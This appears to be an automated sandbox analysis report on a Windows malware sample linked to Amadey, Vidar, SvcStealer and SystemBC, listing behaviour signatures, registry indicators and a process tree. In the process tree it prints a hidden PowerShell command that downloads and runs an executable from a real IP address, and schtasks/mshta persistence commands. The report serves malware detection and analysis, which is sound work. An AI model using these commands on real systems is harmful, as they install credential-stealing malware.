Analysis Overview
SHA256
e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35
Threat Level: Known bad
The file e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe was found to be: Known bad.
Malicious Activity Summary
Detects SvcStealer Payload
Amadey
Svcstealer family
Vidar family
Amadey family
SvcStealer, Diamotrix
Systembc family
Vidar
SystemBC
Detect Vidar Stealer
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Checks BIOS information in registry
Executes dropped EXE
Reads user/profile data of local email clients
Loads dropped DLL
.NET Reactor protector
Checks computer location settings
Identifies Wine through registry keys
Reads user/profile data of web browsers
Checks installed software on the system
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
AutoIT Executable
Drops file in Windows directory
Program crash
Enumerates physical storage devices
Unsigned PE
System Location Discovery: System Language Discovery
Browser Information Discovery
Scheduled Task/Job: Scheduled Task
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-05 03:56
Signatures
AutoIT Executable
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-05 03:56
Reported
2025-03-05 03:59
Platform
win7-20240903-en
Max time kernel
150s
Max time network
151s
Signatures
Amadey
Amadey family
Detect Vidar Stealer
Detects SvcStealer Payload
SvcStealer, Diamotrix
Svcstealer family
SystemBC
Systembc family
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\djrq\nbiciq.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
.NET Reactor protector
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\djrq\nbiciq.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\djrq\nbiciq.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\ProgramData\djrq\nbiciq.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\defacfcbcbdbaac = "\"C:\\ProgramData\\defacfcbcbdbaac.exe\"" | C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\6eaad46262.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10097710101\\6eaad46262.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10097720121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE | N/A |
| N/A | N/A | C:\ProgramData\djrq\nbiciq.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2936 set thread context of 2460 | N/A | C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe |
| PID 2648 set thread context of 1580 | N/A | C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe | N/A |
| File created | C:\Windows\Tasks\futors.job | C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe | N/A |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| File opened for modification | C:\Windows\WindowsUpdate.log | C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\djrq\nbiciq.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe
"C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
"C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 500
C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe"
C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
"C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe"
C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe
"C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe" -burn.filehandle.attached=216 -burn.filehandle.self=212
C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe
C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 208
C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
"C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"
C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 1200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 1036
C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe
"C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe"
C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe
"C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe"
C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 1216
C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe
"C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe"
C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
"C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
"C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe"
C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
"C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe
"C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2336 -s 852
C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe"
C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
"C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe"
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe
"C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn zlcjtmaYQKF /tr "mshta C:\Users\Admin\AppData\Local\Temp\I8dYGpBlS.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\I8dYGpBlS.hta
C:\Windows\SysWOW64\schtasks.exe
